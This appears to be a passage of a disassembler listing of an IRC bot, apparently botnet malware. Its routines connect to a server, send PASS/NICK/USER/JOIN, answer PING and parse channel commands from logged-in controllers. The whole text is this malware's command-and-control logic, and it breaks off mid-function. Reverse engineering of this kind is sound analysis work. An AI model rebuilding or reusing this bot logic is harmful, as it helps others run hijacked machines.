var_64C = byte ptr -64Ch
var_5AC = byte ptr -5ACh
var_4AC = byte ptr -4ACh
var_2AC = byte ptr -2ACh
var_AC = byte ptr -0ACh
var_2C = byte ptr -2Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov eax, 1E1Ch
lea ebp, [esp-58h]
call sub_414800
push ebx
push esi
xor ebx, ebx
push 2
mov [ebp+58h+var_14], ebx
lea eax, [ebp+58h+var_5AC]
pop ecx
loc_40865C: ; CODE XREF: sub_40863D+28�j
and byte ptr [eax], 0
add eax, 80h
dec ecx
jnz short loc_40865C
cmp byte_47BF00, 0
jz short loc_408685
push offset byte_47BF00
push offset aPassS ; "PASS %s\r\n"
push [ebp+58h+arg_0]
call sub_4056B0
add esp, 0Ch
loc_408685: ; CODE XREF: sub_40863D+31�j
push [ebp+58h+arg_C]
lea eax, [ebp+58h+var_2C]
push ebx
push ebx
push 2
push eax
call sub_40FD06
add esp, 10h
push eax
push [ebp+58h+arg_C]
lea eax, [ebp+58h+var_AC]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax
call sub_4145E5
lea eax, [ebp+58h+var_AC]
add esp, 14h
lea esi, [eax+1]
loc_4086B3: ; CODE XREF: sub_40863D+7B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4086B3
push ebx
sub eax, esi
push eax
lea eax, [ebp+58h+var_AC]
push eax
push [ebp+58h+arg_0]
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4086EB
push [ebp+58h+arg_0]
call dword_4358F4 ; closesocket
push 7D0h
call ds:dword_420000 ; Sleep
xor eax, eax
jmp loc_4088B2
; ---------------------------------------------------------------------------
loc_4086EB: ; CODE XREF: sub_40863D+91�j
push edi
jmp loc_408878
; ---------------------------------------------------------------------------
loc_4086F1: ; CODE XREF: sub_40863D+262�j
lea eax, [ebp+58h+var_E1C]
push eax
lea eax, [ebp+58h+var_1E1C]
push eax
call sub_406769
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+58h+var_18], eax
mov [ebp+58h+var_10], ebx
jle loc_408878
lea esi, [ebp+58h+var_E1C]
mov [ebp+58h+var_C], esi
loc_40871D: ; CODE XREF: sub_40863D+235�j
push offset asc_425A50 ; " :"
push dword ptr [esi]
xor eax, eax
mov ecx, 80h
lea edi, [ebp+58h+var_2AC]
rep stosd
call sub_4150B0
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+58h+var_4], eax
jz short loc_408747
add [ebp+58h+var_4], 2
jmp short loc_40874C
; ---------------------------------------------------------------------------
loc_408747: ; CODE XREF: sub_40863D+102�j
mov eax, [esi]
mov [ebp+58h+var_4], eax
loc_40874C: ; CODE XREF: sub_40863D+108�j
push 1FFh
push [ebp+58h+var_4]
lea eax, [ebp+58h+var_2AC]
push eax
call sub_414670
lea eax, [ebp+58h+var_2AC]
push offset asc_425A4C ; "|"
push eax
call sub_415459
add esp, 14h
test eax, eax
mov [ebp+58h+var_8], eax
lea ebx, [ebp+58h+var_2AC]
jz loc_408861
loc_408785: ; CODE XREF: sub_40863D+21E�j
xor eax, eax
mov ecx, 80h
lea edi, [ebp+58h+var_4AC]
rep stosd
mov eax, [esi]
mov ecx, [ebp+58h+var_4]
sub ecx, eax
push ecx
push eax
lea eax, [ebp+58h+var_4AC]
push eax
call sub_414670
mov eax, [ebp+58h+var_8]
add esp, 0Ch
mov esi, eax
loc_4087B1: ; CODE XREF: sub_40863D+179�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4087B1
lea edi, [ebp+58h+var_4AC]
sub eax, esi
dec edi
loc_4087C1: ; CODE XREF: sub_40863D+18A�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4087C1
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebp+58h+var_8]
and ecx, 3
rep movsb
lea esi, [eax+1]
loc_4087DD: ; CODE XREF: sub_40863D+1A5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4087DD
sub eax, esi
lea ebx, [ebx+eax+1]
push offset asc_425A4C ; "|"
push ebx
call sub_415459
pop ecx
xor esi, esi
pop ecx
mov [ebp+58h+var_8], eax
inc esi
loc_4087FD: ; CODE XREF: sub_40863D+206�j
push [ebp+58h+arg_1C]
lea eax, [ebp+58h+var_14]
push esi
push eax
lea eax, [ebp+58h+var_64C]
push eax
lea eax, [ebp+58h+var_5AC]
push eax
push [ebp+58h+arg_18]
lea eax, [ebp+58h+var_4AC]
push [ebp+58h+arg_C]
push [ebp+58h+arg_8]
push [ebp+58h+arg_4]
push [ebp+58h+arg_0]
push eax
call sub_408A18
add esp, 2Ch
dec eax
mov esi, eax
test esi, esi
jle short loc_408845
push 0FAh
call ds:dword_420000 ; Sleep
jmp short loc_4087FD
; ---------------------------------------------------------------------------
loc_408845: ; CODE XREF: sub_40863D+1F9�j
cmp esi, 0FFFFFFFDh
jz short loc_4088AE
cmp esi, 0FFFFFFFEh
jz short loc_4088A9
cmp esi, 0FFFFFFFFh
jz short loc_4088A5
cmp [ebp+58h+var_8], 0
mov esi, [ebp+58h+var_C]
jnz loc_408785
loc_408861: ; CODE XREF: sub_40863D+142�j
inc [ebp+58h+var_10]
mov eax, [ebp+58h+var_10]
add esi, 4
xor ebx, ebx
cmp eax, [ebp+58h+var_18]
mov [ebp+58h+var_C], esi
jl loc_40871D
loc_408878: ; CODE XREF: sub_40863D+AF�j
; sub_40863D+D1�j
xor eax, eax
push ebx
lea edi, [ebp+58h+var_1E1C]
mov ecx, 400h
rep stosd
push 1000h
lea eax, [ebp+58h+var_1E1C]
push eax
push [ebp+58h+arg_0]
call dword_43575C ; recv
test eax, eax
jg loc_4086F1
loc_4088A5: ; CODE XREF: sub_40863D+215�j
xor eax, eax
jmp short loc_4088B1
; ---------------------------------------------------------------------------
loc_4088A9: ; CODE XREF: sub_40863D+210�j
xor eax, eax
inc eax
jmp short loc_4088B1
; ---------------------------------------------------------------------------
loc_4088AE: ; CODE XREF: sub_40863D+20B�j
push 2
pop eax
loc_4088B1: ; CODE XREF: sub_40863D+26A�j
; sub_40863D+26F�j
pop edi
loc_4088B2: ; CODE XREF: sub_40863D+A9�j
pop esi
pop ebx
add ebp, 58h
leave
retn
sub_40863D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4088B9 proc near ; CODE XREF: sub_40E745+472�p
; DATA XREF: sub_408A18+2C18�o
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 59h
xor ebx, ebx
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
inc ebx
rep movsd
mov [eax+160h], ebx
jmp loc_4089B4
; ---------------------------------------------------------------------------
loc_4088E3: ; CODE XREF: sub_4088B9+129�j
push 7
pop ecx
xor eax, eax
push eax
push dword_42BEDC
lea edi, [ebp+var_2C]
push dword_42BED8
rep stosd
lea eax, [ebp+var_2C]
push eax
call sub_40FD06
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh
add eax, offset byte_436698
push edi
push eax
call sub_414670
add esp, 1Ch
push 6
push ebx
push 2
call dword_4357E8 ; socket
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
mov dword_43668C[eax], esi
push 10h
lea eax, [ebp+var_10]
push eax
push esi
call dword_4357A0 ; connect
cmp eax, 0FFFFFFFFh
jz loc_4089EA
lea eax, [ebp+var_18C]
push eax
push offset aMainConnectedT ; "[MAIN]: Connected to %s."
call sub_401F73
push [ebp+var_38]
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
push [ebp+var_190]
lea eax, [ebp+var_CC]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_40863D
add esp, 28h
push esi
mov edi, eax
call dword_4358F4 ; closesocket
test edi, edi
jz short loc_4089B4
cmp edi, ebx
jnz short loc_4089AF
push 1D4C0h
call ds:dword_420000 ; Sleep
jmp short loc_4089B4
; ---------------------------------------------------------------------------
loc_4089AF: ; CODE XREF: sub_4088B9+E7�j
cmp edi, 2
jz short loc_408A05
loc_4089B4: ; CODE XREF: sub_4088B9+25�j
; sub_4088B9+E3�j ...
push [ebp+var_3C]
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
mov [ebp+var_10], 2
call dword_435934 ; ntohs
mov [ebp+var_E], ax
lea eax, [ebp+var_18C]
push eax
call sub_407C3B
test eax, eax
pop ecx
mov [ebp+var_C], eax
jnz loc_4088E3
jmp short loc_408A11
; ---------------------------------------------------------------------------
loc_4089EA: ; CODE XREF: sub_4088B9+92�j
push esi
call dword_4358F4 ; closesocket
call sub_407C64
push 7D0h
call ds:dword_420000 ; Sleep
mov eax, ebx
jmp short loc_408A11
; ---------------------------------------------------------------------------
loc_408A05: ; CODE XREF: sub_4088B9+F9�j
push [ebp+var_34]
call sub_412735
pop ecx
push 2
pop eax
loc_408A11: ; CODE XREF: sub_4088B9+12F�j
; sub_4088B9+14A�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_4088B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408A18 proc near ; CODE XREF: sub_40863D+1EC�p
var_2800 = byte ptr -2800h
var_2400 = byte ptr -2400h
var_2270 = byte ptr -2270h
var_2070 = byte ptr -2070h
var_1F70 = byte ptr -1F70h
var_1D70 = byte ptr -1D70h
var_1C70 = byte ptr -1C70h
var_1C6C = byte ptr -1C6Ch
var_1B6C = dword ptr -1B6Ch
var_1B68 = dword ptr -1B68h
var_1B64 = byte ptr -1B64h
var_1AE4 = byte ptr -1AE4h
var_1A64 = byte ptr -1A64h
var_19E4 = byte ptr -19E4h
var_1964 = byte ptr -1964h
var_18E4 = dword ptr -18E4h
var_18E0 = dword ptr -18E0h
var_18DC = dword ptr -18DCh
var_18D8 = dword ptr -18D8h
var_18D4 = byte ptr -18D4h
var_1854 = byte ptr -1854h
var_17D4 = byte ptr -17D4h
var_1754 = byte ptr -1754h
var_16D4 = dword ptr -16D4h
var_16D0 = dword ptr -16D0h
var_16CC = dword ptr -16CCh
var_16C8 = dword ptr -16C8h
var_16C4 = dword ptr -16C4h
var_16C0 = byte ptr -16C0h
var_15C0 = byte ptr -15C0h
var_1540 = dword ptr -1540h
var_1538 = dword ptr -1538h
var_1534 = dword ptr -1534h
var_1530 = dword ptr -1530h
var_152C = dword ptr -152Ch
var_1528 = dword ptr -1528h
var_1524 = byte ptr -1524h
var_1520 = byte ptr -1520h
var_1420 = byte ptr -1420h
var_141C = byte ptr -141Ch
var_139C = byte ptr -139Ch
var_135C = byte ptr -135Ch
var_12CC = dword ptr -12CCh
var_12C8 = dword ptr -12C8h
var_12C4 = dword ptr -12C4h
var_12C0 = dword ptr -12C0h
var_12BC = dword ptr -12BCh
var_12B8 = byte ptr -12B8h
var_12B4 = dword ptr -12B4h
var_12B0 = byte ptr -12B0h
var_1230 = byte ptr -1230h
var_11B4 = byte ptr -11B4h
var_112C = byte ptr -112Ch
var_10B0 = dword ptr -10B0h
var_10AC = dword ptr -10ACh
var_10A8 = dword ptr -10A8h
var_10A4 = byte ptr -10A4h
var_1028 = dword ptr -1028h
var_1024 = dword ptr -1024h
var_1020 = dword ptr -1020h
var_101C = dword ptr -101Ch
var_1018 = dword ptr -1018h
var_1010 = byte ptr -1010h
var_F90 = byte ptr -0F90h
var_F10 = dword ptr -0F10h
var_F0C = dword ptr -0F0Ch
var_F08 = dword ptr -0F08h
var_F00 = dword ptr -0F00h
var_EFC = dword ptr -0EFCh
var_EF8 = dword ptr -0EF8h
var_EF0 = dword ptr -0EF0h
var_EEC = byte ptr -0EECh
var_EE8 = dword ptr -0EE8h
var_EE4 = byte ptr -0EE4h
var_E64 = byte ptr -0E64h
var_D64 = byte ptr -0D64h
var_C65 = byte ptr -0C65h
var_C64 = byte ptr -0C64h
var_B64 = dword ptr -0B64h
var_B60 = dword ptr -0B60h
var_B5C = dword ptr -0B5Ch
var_B58 = dword ptr -0B58h
var_B54 = dword ptr -0B54h
var_B50 = dword ptr -0B50h
var_B4C = dword ptr -0B4Ch
var_B48 = dword ptr -0B48h
var_B44 = dword ptr -0B44h
var_B40 = byte ptr -0B40h
var_AC0 = dword ptr -0AC0h
var_ABC = byte ptr -0ABCh
var_AB0 = byte ptr -0AB0h
var_AAC = byte ptr -0AACh
var_A3C = byte ptr -0A3Ch
var_9BC = dword ptr -9BCh
var_9B8 = dword ptr -9B8h
var_9B4 = dword ptr -9B4h
var_9B0 = dword ptr -9B0h
var_9AC = byte ptr -9ACh
var_9A0 = byte ptr -9A0h
var_990 = dword ptr -990h
var_98C = byte ptr -98Ch
var_954 = dword ptr -954h
var_950 = byte ptr -950h
var_90C = byte ptr -90Ch
var_8D0 = byte ptr -8D0h
var_8CC = byte ptr -8CCh
var_850 = byte ptr -850h
var_7D0 = dword ptr -7D0h
var_7CC = dword ptr -7CCh
var_7C8 = dword ptr -7C8h
var_7C4 = dword ptr -7C4h
var_7C0 = dword ptr -7C0h
var_7BC = dword ptr -7BCh
var_7B8 = dword ptr -7B8h
var_7B4 = dword ptr -7B4h
var_7B0 = dword ptr -7B0h
var_7AC = byte ptr -7ACh
var_72C = byte ptr -72Ch
var_6AC = dword ptr -6ACh
var_6A8 = dword ptr -6A8h
var_6A4 = dword ptr -6A4h
var_6A0 = dword ptr -6A0h
var_69C = dword ptr -69Ch
var_698 = dword ptr -698h
var_694 = dword ptr -694h
var_690 = dword ptr -690h
var_68C = byte ptr -68Ch
var_67C = byte ptr -67Ch
var_5FC = dword ptr -5FCh
var_5F8 = byte ptr -5F8h
var_578 = byte ptr -578h
var_4F8 = dword ptr -4F8h
var_4F4 = dword ptr -4F4h
var_4F0 = dword ptr -4F0h
var_4EC = dword ptr -4ECh
var_4E8 = dword ptr -4E8h
var_4DC = dword ptr -4DCh
var_4D8 = dword ptr -4D8h
var_4D0 = dword ptr -4D0h
var_4CC = dword ptr -4CCh
var_4C8 = dword ptr -4C8h
var_4C4 = dword ptr -4C4h
var_4BC = byte ptr -4BCh
var_45B = byte ptr -45Bh
var_45A = byte ptr -45Ah
var_458 = byte ptr -458h
var_457 = byte ptr -457h
var_454 = dword ptr -454h
var_450 = byte ptr -450h
var_44E = byte ptr -44Eh
var_44C = byte ptr -44Ch
var_44B = byte ptr -44Bh
var_44A = byte ptr -44Ah
var_449 = byte ptr -449h
var_442 = byte ptr -442h
var_420 = byte ptr -420h
var_400 = dword ptr -400h
var_3D4 = dword ptr -3D4h
var_3D0 = dword ptr -3D0h
var_3CC = dword ptr -3CCh
var_3C8 = dword ptr -3C8h
var_3C4 = dword ptr -3C4h
var_3C0 = dword ptr -3C0h
var_3BC = byte ptr -3BCh
var_3A0 = dword ptr -3A0h
var_39C = byte ptr -39Ch
var_398 = dword ptr -398h
var_394 = byte ptr -394h
var_388 = dword ptr -388h
var_384 = byte ptr -384h
var_31C = byte ptr -31Ch
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = byte ptr -2F0h
var_F0 = byte ptr -0F0h
var_D8 = word ptr -0D8h
var_D6 = word ptr -0D6h
var_D4 = dword ptr -0D4h
var_C8 = byte ptr -0C8h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_68 = byte ptr -68h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 2800h
call sub_414800
push ebx
push esi
push edi
mov esi, 80h
xor eax, eax
push 1Bh
push [ebp+arg_10]
xor ebx, ebx
mov ecx, esi
lea edi, [ebp+var_2F0]
rep stosd
lea eax, [ebp+var_3BC]
push eax
mov [ebp+var_20], 3
mov [ebp+var_18], ebx
mov [ebp+var_1C], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [ebp+var_C], ebx
call sub_414670
add esp, 0Ch
xor eax, eax
cmp [ebp+arg_0], ebx
jz loc_408C98
mov ecx, esi
mov esi, 1FFh
push esi
push [ebp+arg_0]
lea edi, [ebp+var_1F70]
rep stosd
lea eax, [ebp+var_1F70]
push eax
call sub_414670
lea eax, [ebp+var_1F70]
push offset asc_425A50 ; " :"
push eax
call sub_4150B0
mov [ebp+var_14], eax
push esi
lea eax, [ebp+var_1F70]
push eax
lea eax, [ebp+var_2270]
push eax
call sub_414670
mov esi, offset asc_420AE8 ; " "
lea eax, [ebp+var_2270]
push esi
push eax
call sub_415459
xor edi, edi
add esp, 28h
mov [ebp+var_A8], eax
inc edi
loc_408AD5: ; CODE XREF: sub_408A18+D1�j
push esi
push ebx
call sub_415459
mov [ebp+edi*4+var_A8], eax
inc edi
cmp edi, 20h
pop ecx
pop ecx
jl short loc_408AD5
mov ebx, [ebp+var_A8]
xor esi, esi
cmp ebx, esi
jz loc_408C96
cmp [ebp+var_A4], esi
jz loc_408C96
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_4BC]
push 1Fh
rep stosd
pop edx
loc_408B17: ; CODE XREF: sub_408A18+137�j
lea ecx, [ebp+edx*4+var_A8]
mov eax, [ecx]
cmp eax, esi
jz short loc_408B4E
cmp byte ptr [eax], 2Dh
jnz short loc_408B51
cmp byte ptr [eax+2], 0
jnz short loc_408B51
movsx edi, byte ptr [eax+1]
and byte ptr [eax], 0
and byte ptr [eax+1], 0
and byte ptr [eax+2], 0
mov [ecx], esi
mov ebx, [ebp+var_A8]
mov [ebp+edi+var_4BC], 1
loc_408B4E: ; CODE XREF: sub_408A18+10A�j
dec edx
jns short loc_408B17
loc_408B51: ; CODE XREF: sub_408A18+10F�j
; sub_408A18+115�j
cmp [ebp+var_449], 0
jz short loc_408B61
mov [ebp+var_8], 1
loc_408B61: ; CODE XREF: sub_408A18+140�j
cmp [ebp+var_44E], 0
jz short loc_408B74
mov [ebp+var_8], esi
mov [ebp+var_4], 1
loc_408B74: ; CODE XREF: sub_408A18+150�j
cmp byte ptr [ebx], 0Ah
jz short loc_408BAE
push 7Fh
lea eax, [ebp+var_B40]
push ebx
push eax
call sub_414670
push 17h
lea eax, [ebx+1]
push eax
lea eax, [ebp+var_F0]
push eax
call sub_414670
lea eax, [ebp+var_F0]
push offset asc_427A38 ; "!"
push eax
call sub_415459
add esp, 20h
loc_408BAE: ; CODE XREF: sub_408A18+15F�j
push 5
mov edi, ebx
mov esi, offset aPing ; "PING"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_408BFC
push [ebp+var_A4]
mov byte ptr [ebx+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4]
call sub_4056B0
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp dword ptr [eax], 0
jnz loc_408C96
loc_408BE4: ; CODE XREF: sub_408A18+3D7�j
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
loc_408BEF: ; CODE XREF: sub_408A18+6D3�j
; sub_408A18+936�j ...
push [ebp+arg_4]
call sub_4056B0
jmp loc_40D39B
; ---------------------------------------------------------------------------
loc_408BFC: ; CODE XREF: sub_408A18+1A4�j
mov edx, [ebp+var_A4]
push 4
pop eax
mov edi, edx
mov esi, offset a001 ; "001"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jz loc_40E6FD
mov edi, edx
mov esi, offset a005 ; "005"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jz loc_40E6FD
mov edi, edx
mov esi, offset a302 ; "302"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jnz short loc_408C5F
push offset a@ ; "@"
push [ebp+var_9C]
call sub_4150B0
test eax, eax
pop ecx
pop ecx
jz short loc_408C96
push 9Fh
inc eax
push eax
push [ebp+arg_1C]
jmp loc_408F04
; ---------------------------------------------------------------------------
loc_408C5F: ; CODE XREF: sub_408A18+220�j
mov ecx, eax
mov edi, edx
mov esi, offset a433 ; "433"
xor eax, eax
repe cmpsb
jnz short loc_408C9E
push eax
push dword_42BEDC
push dword_42BED8
push [ebp+arg_10]
call sub_40FD06
push [ebp+arg_10]
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_4056B0
add esp, 1Ch
loc_408C96: ; CODE XREF: sub_408A18+DD�j
; sub_408A18+E9�j ...
xor eax, eax
loc_408C98: ; CODE XREF: sub_408A18+52�j
inc eax
loc_408C99: ; CODE XREF: sub_408A18+173A�j
; sub_408A18+320D�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_408C9E: ; CODE XREF: sub_408A18+254�j
mov edi, [ebp+arg_18]
push 2
pop edx
loc_408CA4: ; CODE XREF: sub_408A18+2CD�j
lea eax, [ebp+var_B40]
mov esi, edi
loc_408CAC: ; CODE XREF: sub_408A18+2B0�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_408CCE
test cl, cl
jz short loc_408CCA
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_408CCE
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_408CAC
loc_408CCA: ; CODE XREF: sub_408A18+29E�j
xor eax, eax
jmp short loc_408CD3
; ---------------------------------------------------------------------------
loc_408CCE: ; CODE XREF: sub_408A18+29A�j
; sub_408A18+2A8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_408CD3: ; CODE XREF: sub_408A18+2B4�j
test eax, eax
jnz short loc_408CDE
mov [ebp+var_1C], 1
loc_408CDE: ; CODE XREF: sub_408A18+2BD�j
add edi, 80h
dec edx
jnz short loc_408CA4
mov edi, [ebp+var_A4]
push 5
mov esi, offset aKick ; "KICK"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_408DF4
mov edi, [ebp+arg_18]
push 2
pop ebx
loc_408D05: ; CODE XREF: sub_408A18+393�j
cmp byte ptr [edi], 0
jz loc_408DA4
push 7Fh
lea eax, [ebp+var_B40]
push edi
push eax
call sub_414670
add esp, 0Ch
cmp [ebp+var_9C], 0
jz short loc_408DA4
mov esi, [ebp+var_9C]
lea eax, [ebp+var_F0]
loc_408D35: ; CODE XREF: sub_408A18+339�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_408D57
test cl, cl
jz short loc_408D53
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_408D57
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_408D35
loc_408D53: ; CODE XREF: sub_408A18+327�j
xor eax, eax
jmp short loc_408D5C
; ---------------------------------------------------------------------------
loc_408D57: ; CODE XREF: sub_408A18+323�j
; sub_408A18+331�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_408D5C: ; CODE XREF: sub_408A18+33D�j
test eax, eax
jnz short loc_408DA4
and [edi], al
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_2F0]
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
push eax
call sub_4145E5
lea eax, [ebp+var_2F0]
push eax
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4]
call sub_4056B0
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
add esp, 20h
loc_408DA4: ; CODE XREF: sub_408A18+2F0�j
; sub_408A18+30F�j ...
add edi, 80h
dec ebx
jnz loc_408D05
mov esi, [ebp+var_9C]
mov eax, [ebp+arg_10]
loc_408DBA: ; CODE XREF: sub_408A18+3BE�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_408DDC
test cl, cl
jz short loc_408DD8
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_408DDC
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_408DBA
loc_408DD8: ; CODE XREF: sub_408A18+3AC�j
xor eax, eax
jmp short loc_408DE1
; ---------------------------------------------------------------------------
loc_408DDC: ; CODE XREF: sub_408A18+3A8�j
; sub_408A18+3B6�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_408DE1: ; CODE XREF: sub_408A18+3C2�j
test eax, eax
jnz loc_408C96
mov eax, [ebp+arg_20]
and dword ptr [eax], 0
jmp loc_408BE4
; ---------------------------------------------------------------------------
loc_408DF4: ; CODE XREF: sub_408A18+2E1�j
mov edi, [ebp+var_A4]
push 5
mov esi, offset aNick ; "NICK"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_408FD4
mov eax, [ebp+var_A0]
or [ebp+var_1C], 0FFFFFFFFh
mov ebx, [ebp+arg_18]
inc eax
sub [ebp+var_1C], eax
mov [ebp+arg_0], eax
mov [ebp+var_20], 2
loc_408E27: ; CODE XREF: sub_408A18+4A0�j
lea eax, [ebp+var_B40]
mov esi, ebx
loc_408E2F: ; CODE XREF: sub_408A18+433�j
mov dl, [esi]
mov cl, dl
cmp dl, [eax]
jnz short loc_408E51
test cl, cl
jz short loc_408E4D
mov dl, [esi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_408E51
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_408E2F
loc_408E4D: ; CODE XREF: sub_408A18+421�j
xor eax, eax
jmp short loc_408E56
; ---------------------------------------------------------------------------
loc_408E51: ; CODE XREF: sub_408A18+41D�j
; sub_408A18+42B�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_408E56: ; CODE XREF: sub_408A18+437�j
test eax, eax
jnz short loc_408EAF
lea eax, [ebp+var_B40]
push 21h
push eax
call sub_415A90
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_408EAF
mov eax, [ebp+var_1C]
mov edx, [ebp+arg_0]
lea ecx, [ebx+2]
mov byte ptr [ebx], 3Ah
lea esi, [eax+ecx]
loc_408E7F: ; CODE XREF: sub_408A18+46F�j
mov al, [edx]
mov [esi+edx], al
inc edx
test al, al
jnz short loc_408E7F
mov eax, edi
mov esi, edi
loc_408E8D: ; CODE XREF: sub_408A18+47A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_408E8D
sub eax, esi
dec ecx
loc_408E97: ; CODE XREF: sub_408A18+485�j
mov dl, [ecx+1]
inc ecx
test dl, dl
jnz short loc_408E97
mov edi, ecx
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_408EAF: ; CODE XREF: sub_408A18+440�j
; sub_408A18+456�j
add ebx, 80h
dec [ebp+var_20]
jnz loc_408E27
cmp [ebp+arg_0], 0
jz loc_408C96
mov esi, [ebp+arg_10]
lea eax, [ebp+var_F0]
loc_408ED1: ; CODE XREF: sub_408A18+4D5�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_408EF3
test cl, cl
jz short loc_408EEF
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_408EF3
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_408ED1
loc_408EEF: ; CODE XREF: sub_408A18+4C3�j
xor eax, eax
jmp short loc_408EF8
; ---------------------------------------------------------------------------
loc_408EF3: ; CODE XREF: sub_408A18+4BF�j
; sub_408A18+4CD�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_408EF8: ; CODE XREF: sub_408A18+4D9�j
test eax, eax
jnz short loc_408F11
push 0Fh
push [ebp+arg_0]
push [ebp+arg_10]
loc_408F04: ; CODE XREF: sub_408A18+242�j
call sub_414670
add esp, 0Ch
jmp loc_408C96
; ---------------------------------------------------------------------------
loc_408F11: ; CODE XREF: sub_408A18+4E2�j
mov edx, [ebp+arg_18]
xor edi, edi
loc_408F16: ; CODE XREF: sub_408A18+540�j
cmp byte ptr [edx], 0
jz short loc_408F4E
lea eax, [ebp+var_B40]
mov esi, edx
loc_408F23: ; CODE XREF: sub_408A18+527�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_408F45
test cl, cl
jz short loc_408F41
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_408F45
inc esi
inc esi
inc eax
inc eax
